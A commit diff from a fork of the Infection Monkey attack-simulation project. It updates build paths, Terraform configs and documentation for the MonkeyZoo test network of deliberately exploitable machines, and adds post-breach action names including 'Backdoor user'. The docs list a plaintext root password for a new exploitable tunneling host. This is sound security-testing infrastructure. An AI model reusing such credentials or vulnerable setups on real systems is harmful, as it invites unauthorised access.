forked from p15670423/monkey
commit
5754ec6044
|
@ -22,7 +22,7 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
|
|||
# Other directories and paths ( most likely you dont need to configure)
|
||||
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
|
||||
$MONKEY_DIR = "\monkey\infection_monkey"
|
||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\monkey_utils\sambacry_monkey_runner"
|
||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
|
||||
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
|
||||
$MK32_DLL = "mk32.dll"
|
||||
$MK64_DLL = "mk64.dll"
|
||||
|
|
|
@ -129,7 +129,7 @@ python -m pip install --user -r requirements_linux.txt || handle_error
|
|||
# Build samba
|
||||
log_message "Building samba binaries"
|
||||
sudo apt-get install gcc-multilib
|
||||
cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
|
||||
cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner
|
||||
sudo chmod +x ./build.sh || handle_error
|
||||
./build.sh
|
||||
|
||||
|
|
|
@ -58,7 +58,7 @@ Requirements:
|
|||
To deploy:
|
||||
1. Configure service account for your project:
|
||||
|
||||
a. Create a service account and name it “your\_name-monkeyZoo-user”
|
||||
a. Create a service account (GCP website -> IAM -> service accounts) and name it “your\_name-monkeyZoo-user”
|
||||
|
||||
b. Give these permissions to your service account:
|
||||
|
||||
|
@ -74,7 +74,7 @@ To deploy:
|
|||
|
||||
**Project -> Owner**
|
||||
|
||||
c. Download its **Service account key**. Select JSON format.
|
||||
c. Download its **Service account key** in JSON and place it in **/gcp_keys** as **gcp_key.json**.
|
||||
2. Get these permissions in monkeyZoo project for your service account (ask monkey developers to add them):
|
||||
|
||||
a. **Compute Engine -\> Compute image user**
|
||||
|
@ -82,20 +82,30 @@ To deploy:
|
|||
../monkey/envs/monkey\_zoo/terraform/config.tf file (don’t forget to
|
||||
link to your service account key file):
|
||||
|
||||
> provider "google" {
|
||||
>
|
||||
> project = "project-28054666"
|
||||
>
|
||||
> region = "europe-west3"
|
||||
>
|
||||
> zone = "europe-west3-b"
|
||||
>
|
||||
> credentials = "${file("project-92050661-9dae6c5a02fc.json")}"
|
||||
>
|
||||
> }
|
||||
>
|
||||
> service\_account\_email="test@project-925243.iam.gserviceaccount.com"
|
||||
|
||||
provider "google" {
|
||||
|
||||
project = "test-000000" // Change to your project id
|
||||
|
||||
region = "europe-west3" // Change to your desired region or leave default
|
||||
|
||||
zone = "europe-west3-b" // Change to your desired zone or leave default
|
||||
|
||||
credentials = "${file("../gcp_keys/gcp_key.json")}" // Change to the location and name of the service key.
|
||||
// If you followed instruction above leave it as is
|
||||
|
||||
}
|
||||
|
||||
locals {
|
||||
|
||||
resource_prefix = "" // All of the resources will have this prefix.
|
||||
// Only change if you want to have multiple zoo's in the same project
|
||||
|
||||
service_account_email="tester-monkeyZoo-user@testproject-000000.iam.gserviceaccount.com" // Service account email
|
||||
|
||||
monkeyzoo_project="guardicore-22050661" // Project where monkeyzoo images are kept. Leave as is.
|
||||
|
||||
}
|
||||
|
||||
4. Run terraform init
|
||||
|
||||
To deploy the network run:<br>
|
||||
|
@ -500,6 +510,42 @@ fullTest.conf is a good config to start, because it covers all machines.
|
|||
</tbody>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<thead>
|
||||
<tr class="header">
|
||||
<th><p><span id="_Toc536021463" class="anchor"></span>Nr. <strong>11</strong> Tunneling M3</p>
|
||||
<p>(10.2.0.11)</p></th>
|
||||
<th>(Exploitable)</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
<tr class="odd">
|
||||
<td>OS:</td>
|
||||
<td><strong>Ubuntu 16.04.05 x64</strong></td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Software:</td>
|
||||
<td>OpenSSL</td>
|
||||
</tr>
|
||||
<tr class="odd">
|
||||
<td>Default service’s port:</td>
|
||||
<td>22</td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Root password:</td>
|
||||
<td>3Q=(Ge(+&w]*</td>
|
||||
</tr>
|
||||
<tr class="odd">
|
||||
<td>Server’s config:</td>
|
||||
<td>Default</td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Notes:</td>
|
||||
<td>Accessible only trough Nr.10</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<thead>
|
||||
<tr class="header">
|
||||
|
|
|
@ -2,9 +2,10 @@ provider "google" {
|
|||
project = "test-000000"
|
||||
region = "europe-west3"
|
||||
zone = "europe-west3-b"
|
||||
credentials = "${file("testproject-000000-0c0b000b00c0.json")}"
|
||||
credentials = "${file("../gcp_keys/gcp_key.json")}"
|
||||
}
|
||||
locals {
|
||||
resource_prefix = ""
|
||||
service_account_email="tester-monkeyZoo-user@testproject-000000.iam.gserviceaccount.com"
|
||||
monkeyzoo_project="guardicore-22050661"
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
resource "google_compute_firewall" "islands-in" {
|
||||
name = "islands-in"
|
||||
name = "${local.resource_prefix}islands-in"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -13,7 +13,7 @@ resource "google_compute_firewall" "islands-in" {
|
|||
}
|
||||
|
||||
resource "google_compute_firewall" "islands-out" {
|
||||
name = "islands-out"
|
||||
name = "${local.resource_prefix}islands-out"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -26,7 +26,7 @@ resource "google_compute_firewall" "islands-out" {
|
|||
}
|
||||
|
||||
resource "google_compute_firewall" "monkeyzoo-in" {
|
||||
name = "monkeyzoo-in"
|
||||
name = "${local.resource_prefix}monkeyzoo-in"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -35,11 +35,11 @@ resource "google_compute_firewall" "monkeyzoo-in" {
|
|||
|
||||
direction = "INGRESS"
|
||||
priority = "65534"
|
||||
source_ranges = ["10.2.2.0/24"]
|
||||
source_ranges = ["10.2.2.0/24", "10.2.1.0/27"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "monkeyzoo-out" {
|
||||
name = "monkeyzoo-out"
|
||||
name = "${local.resource_prefix}monkeyzoo-out"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -48,11 +48,11 @@ resource "google_compute_firewall" "monkeyzoo-out" {
|
|||
|
||||
direction = "EGRESS"
|
||||
priority = "65534"
|
||||
destination_ranges = ["10.2.2.0/24"]
|
||||
destination_ranges = ["10.2.2.0/24", "10.2.1.0/27"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "tunneling-in" {
|
||||
name = "tunneling-in"
|
||||
name = "${local.resource_prefix}tunneling-in"
|
||||
network = "${google_compute_network.tunneling.name}"
|
||||
|
||||
allow {
|
||||
|
@ -60,11 +60,11 @@ resource "google_compute_firewall" "tunneling-in" {
|
|||
}
|
||||
|
||||
direction = "INGRESS"
|
||||
source_ranges = ["10.2.1.0/28"]
|
||||
source_ranges = ["10.2.2.0/24", "10.2.0.0/28"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "tunneling-out" {
|
||||
name = "tunneling-out"
|
||||
name = "${local.resource_prefix}tunneling-out"
|
||||
network = "${google_compute_network.tunneling.name}"
|
||||
|
||||
allow {
|
||||
|
@ -72,5 +72,28 @@ resource "google_compute_firewall" "tunneling-out" {
|
|||
}
|
||||
|
||||
direction = "EGRESS"
|
||||
destination_ranges = ["10.2.1.0/28"]
|
||||
destination_ranges = ["10.2.2.0/24", "10.2.0.0/28"]
|
||||
}
|
||||
resource "google_compute_firewall" "tunneling2-in" {
|
||||
name = "${local.resource_prefix}tunneling2-in"
|
||||
network = "${google_compute_network.tunneling2.name}"
|
||||
|
||||
allow {
|
||||
protocol = "all"
|
||||
}
|
||||
|
||||
direction = "INGRESS"
|
||||
source_ranges = ["10.2.1.0/27"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "tunneling2-out" {
|
||||
name = "${local.resource_prefix}tunneling2-out"
|
||||
network = "${google_compute_network.tunneling2.name}"
|
||||
|
||||
allow {
|
||||
protocol = "all"
|
||||
}
|
||||
|
||||
direction = "EGRESS"
|
||||
destination_ranges = ["10.2.1.0/27"]
|
||||
}
|
||||
|
|
|
@ -26,23 +26,27 @@ data "google_compute_image" "shellshock-8" {
|
|||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "tunneling-9" {
|
||||
name = "tunneling-9-v2"
|
||||
name = "tunneling-9"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "tunneling-10" {
|
||||
name = "tunneling-10-v2"
|
||||
name = "tunneling-10"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "tunneling-11" {
|
||||
name = "tunneling-11"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "sshkeys-11" {
|
||||
name = "sshkeys-11-v2"
|
||||
name = "sshkeys-11"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "sshkeys-12" {
|
||||
name = "sshkeys-12-v2"
|
||||
name = "sshkeys-12"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "mimikatz-14" {
|
||||
name = "mimikatz-14-v2"
|
||||
name = "mimikatz-14"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "mimikatz-15" {
|
||||
|
@ -58,7 +62,7 @@ data "google_compute_image" "weblogic-18" {
|
|||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "weblogic-19" {
|
||||
name = "weblogic-19-v2"
|
||||
name = "weblogic-19"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "smb-20" {
|
||||
|
@ -78,7 +82,7 @@ data "google_compute_image" "struts2-23" {
|
|||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "struts2-24" {
|
||||
name = "struts-24-v2"
|
||||
name = "struts2-24"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "island-linux-250" {
|
||||
|
@ -88,4 +92,4 @@ data "google_compute_image" "island-linux-250" {
|
|||
data "google_compute_image" "island-windows-251" {
|
||||
name = "island-windows-251"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
}
|
||||
|
|
|
@ -6,29 +6,40 @@ locals {
|
|||
}
|
||||
|
||||
resource "google_compute_network" "monkeyzoo" {
|
||||
name = "monkeyzoo"
|
||||
name = "${local.resource_prefix}monkeyzoo"
|
||||
auto_create_subnetworks = false
|
||||
}
|
||||
|
||||
resource "google_compute_network" "tunneling" {
|
||||
name = "tunneling"
|
||||
name = "${local.resource_prefix}tunneling"
|
||||
auto_create_subnetworks = false
|
||||
}
|
||||
|
||||
resource "google_compute_network" "tunneling2" {
|
||||
name = "${local.resource_prefix}tunneling2"
|
||||
auto_create_subnetworks = false
|
||||
}
|
||||
|
||||
resource "google_compute_subnetwork" "monkeyzoo-main" {
|
||||
name = "monkeyzoo-main"
|
||||
name = "${local.resource_prefix}monkeyzoo-main"
|
||||
ip_cidr_range = "10.2.2.0/24"
|
||||
network = "${google_compute_network.monkeyzoo.self_link}"
|
||||
}
|
||||
|
||||
resource "google_compute_subnetwork" "tunneling-main" {
|
||||
name = "tunneling-main"
|
||||
name = "${local.resource_prefix}tunneling-main"
|
||||
ip_cidr_range = "10.2.1.0/28"
|
||||
network = "${google_compute_network.tunneling.self_link}"
|
||||
}
|
||||
|
||||
resource "google_compute_subnetwork" "tunneling2-main" {
|
||||
name = "${local.resource_prefix}tunneling2-main"
|
||||
ip_cidr_range = "10.2.0.0/27"
|
||||
network = "${google_compute_network.tunneling2.self_link}"
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "hadoop-2" {
|
||||
name = "hadoop-2"
|
||||
name = "${local.resource_prefix}hadoop-2"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -37,7 +48,7 @@ resource "google_compute_instance_from_template" "hadoop-2" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.2"
|
||||
}
|
||||
// Add required ssh keys for hadoop service and restart it
|
||||
|
@ -45,7 +56,7 @@ resource "google_compute_instance_from_template" "hadoop-2" {
|
|||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "hadoop-3" {
|
||||
name = "hadoop-3"
|
||||
name = "${local.resource_prefix}hadoop-3"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -54,13 +65,13 @@ resource "google_compute_instance_from_template" "hadoop-3" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.3"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "elastic-4" {
|
||||
name = "elastic-4"
|
||||
name = "${local.resource_prefix}elastic-4"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -69,13 +80,13 @@ resource "google_compute_instance_from_template" "elastic-4" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.4"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "elastic-5" {
|
||||
name = "elastic-5"
|
||||
name = "${local.resource_prefix}elastic-5"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -84,14 +95,14 @@ resource "google_compute_instance_from_template" "elastic-5" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.5"
|
||||
}
|
||||
}
|
||||
|
||||
/* Couldn't find ubuntu packages for required samba version (too old).
|
||||
resource "google_compute_instance_from_template" "sambacry-6" {
|
||||
name = "sambacry-6"
|
||||
name = "${local.resource_prefix}sambacry-6"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -99,7 +110,7 @@ resource "google_compute_instance_from_template" "sambacry-6" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.6"
|
||||
}
|
||||
}
|
||||
|
@ -107,7 +118,7 @@ resource "google_compute_instance_from_template" "sambacry-6" {
|
|||
|
||||
/* We need custom 32 bit Ubuntu machine for this (there are no 32 bit ubuntu machines in GCP).
|
||||
resource "google_compute_instance_from_template" "sambacry-7" {
|
||||
name = "sambacry-7"
|
||||
name = "${local.resource_prefix}sambacry-7"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk {
|
||||
initialize_params {
|
||||
|
@ -116,14 +127,14 @@ resource "google_compute_instance_from_template" "sambacry-7" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.7"
|
||||
}
|
||||
}
|
||||
*/
|
||||
|
||||
resource "google_compute_instance_from_template" "shellshock-8" {
|
||||
name = "shellshock-8"
|
||||
name = "${local.resource_prefix}shellshock-8"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -132,13 +143,13 @@ resource "google_compute_instance_from_template" "shellshock-8" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.8"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "tunneling-9" {
|
||||
name = "tunneling-9"
|
||||
name = "${local.resource_prefix}tunneling-9"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -147,18 +158,17 @@ resource "google_compute_instance_from_template" "tunneling-9" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="tunneling-main"
|
||||
subnetwork="${local.resource_prefix}tunneling-main"
|
||||
network_ip="10.2.1.9"
|
||||
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.9"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "tunneling-10" {
|
||||
name = "tunneling-10"
|
||||
name = "${local.resource_prefix}tunneling-10"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -167,13 +177,32 @@ resource "google_compute_instance_from_template" "tunneling-10" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="tunneling-main"
|
||||
subnetwork="${local.resource_prefix}tunneling-main"
|
||||
network_ip="10.2.1.10"
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="${local.resource_prefix}tunneling2-main"
|
||||
network_ip="10.2.0.10"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "tunneling-11" {
|
||||
name = "${local.resource_prefix}tunneling-11"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
image = "${data.google_compute_image.tunneling-11.self_link}"
|
||||
}
|
||||
auto_delete = true
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="${local.resource_prefix}tunneling2-main"
|
||||
network_ip="10.2.0.11"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "sshkeys-11" {
|
||||
name = "sshkeys-11"
|
||||
name = "${local.resource_prefix}sshkeys-11"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -182,13 +211,13 @@ resource "google_compute_instance_from_template" "sshkeys-11" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.11"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "sshkeys-12" {
|
||||
name = "sshkeys-12"
|
||||
name = "${local.resource_prefix}sshkeys-12"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -197,14 +226,14 @@ resource "google_compute_instance_from_template" "sshkeys-12" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.12"
|
||||
}
|
||||
}
|
||||
|
||||
/*
|
||||
resource "google_compute_instance_from_template" "rdpgrinder-13" {
|
||||
name = "rdpgrinder-13"
|
||||
name = "${local.resource_prefix}rdpgrinder-13"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -212,14 +241,14 @@ resource "google_compute_instance_from_template" "rdpgrinder-13" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.13"
|
||||
}
|
||||
}
|
||||
*/
|
||||
|
||||
resource "google_compute_instance_from_template" "mimikatz-14" {
|
||||
name = "mimikatz-14"
|
||||
name = "${local.resource_prefix}mimikatz-14"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -228,13 +257,13 @@ resource "google_compute_instance_from_template" "mimikatz-14" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.14"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "mimikatz-15" {
|
||||
name = "mimikatz-15"
|
||||
name = "${local.resource_prefix}mimikatz-15"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -243,13 +272,13 @@ resource "google_compute_instance_from_template" "mimikatz-15" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.15"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "mssql-16" {
|
||||
name = "mssql-16"
|
||||
name = "${local.resource_prefix}mssql-16"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -258,14 +287,14 @@ resource "google_compute_instance_from_template" "mssql-16" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.16"
|
||||
}
|
||||
}
|
||||
|
||||
/* We need to alter monkey's behavior for this to upload 32-bit monkey instead of 64-bit (not yet developed)
|
||||
resource "google_compute_instance_from_template" "upgrader-17" {
|
||||
name = "upgrader-17"
|
||||
name = "${local.resource_prefix}upgrader-17"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -273,7 +302,7 @@ resource "google_compute_instance_from_template" "upgrader-17" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.17"
|
||||
access_config {
|
||||
// Cheaper, non-premium routing
|
||||
|
@ -284,7 +313,7 @@ resource "google_compute_instance_from_template" "upgrader-17" {
|
|||
*/
|
||||
|
||||
resource "google_compute_instance_from_template" "weblogic-18" {
|
||||
name = "weblogic-18"
|
||||
name = "${local.resource_prefix}weblogic-18"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -293,13 +322,13 @@ resource "google_compute_instance_from_template" "weblogic-18" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.18"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "weblogic-19" {
|
||||
name = "weblogic-19"
|
||||
name = "${local.resource_prefix}weblogic-19"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -308,13 +337,13 @@ resource "google_compute_instance_from_template" "weblogic-19" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.19"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "smb-20" {
|
||||
name = "smb-20"
|
||||
name = "${local.resource_prefix}smb-20"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -323,13 +352,13 @@ resource "google_compute_instance_from_template" "smb-20" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.20"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "scan-21" {
|
||||
name = "scan-21"
|
||||
name = "${local.resource_prefix}scan-21"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -338,13 +367,13 @@ resource "google_compute_instance_from_template" "scan-21" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.21"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "scan-22" {
|
||||
name = "scan-22"
|
||||
name = "${local.resource_prefix}scan-22"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -353,13 +382,13 @@ resource "google_compute_instance_from_template" "scan-22" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.22"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "struts2-23" {
|
||||
name = "struts2-23"
|
||||
name = "${local.resource_prefix}struts2-23"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -368,13 +397,13 @@ resource "google_compute_instance_from_template" "struts2-23" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.23"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "struts2-24" {
|
||||
name = "struts2-24"
|
||||
name = "${local.resource_prefix}struts2-24"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -383,13 +412,13 @@ resource "google_compute_instance_from_template" "struts2-24" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.24"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "island-linux-250" {
|
||||
name = "island-linux-250"
|
||||
name = "${local.resource_prefix}island-linux-250"
|
||||
machine_type = "n1-standard-2"
|
||||
tags = ["island", "linux", "ubuntu16"]
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
|
@ -400,7 +429,7 @@ resource "google_compute_instance_from_template" "island-linux-250" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.250"
|
||||
access_config {
|
||||
// Cheaper, non-premium routing (not available in some regions)
|
||||
|
@ -410,7 +439,7 @@ resource "google_compute_instance_from_template" "island-linux-250" {
|
|||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "island-windows-251" {
|
||||
name = "island-windows-251"
|
||||
name = "${local.resource_prefix}island-windows-251"
|
||||
machine_type = "n1-standard-2"
|
||||
tags = ["island", "windows", "windowsserver2016"]
|
||||
source_instance_template = "${local.default_windows}"
|
||||
|
@ -421,11 +450,11 @@ resource "google_compute_instance_from_template" "island-windows-251" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.251"
|
||||
access_config {
|
||||
// Cheaper, non-premium routing (not available in some regions)
|
||||
// network_tier = "STANDARD"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
resource "google_compute_instance_template" "ubuntu16" {
|
||||
name = "ubuntu16"
|
||||
name = "${local.resource_prefix}ubuntu16"
|
||||
description = "Creates ubuntu 16.04 LTS servers at europe-west3-a."
|
||||
|
||||
tags = ["test-machine", "ubuntu16", "linux"]
|
||||
|
@ -24,7 +24,7 @@ resource "google_compute_instance_template" "ubuntu16" {
|
|||
}
|
||||
|
||||
resource "google_compute_instance_template" "windows2016" {
|
||||
name = "windows2016"
|
||||
name = "${local.resource_prefix}windows2016"
|
||||
description = "Creates windows 2016 core servers at europe-west3-a."
|
||||
|
||||
tags = ["test-machine", "windowsserver2016", "windows"]
|
||||
|
@ -42,4 +42,4 @@ resource "google_compute_instance_template" "windows2016" {
|
|||
email="${local.service_account_email}"
|
||||
scopes=["cloud-platform"]
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
POST_BREACH_COMMUNICATE_AS_NEW_USER = "Communicate as new user"
|
||||
POST_BREACH_BACKDOOR_USER = "Backdoor user"
|
||||
POST_BREACH_FILE_EXECUTION = "File execution"
|
|
@ -2,7 +2,7 @@
|
|||
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
|
||||
in creating findings.
|
||||
|
||||
This file contains static mappings between zero trust components such as: pillars, recommendations, tests, statuses.
|
||||
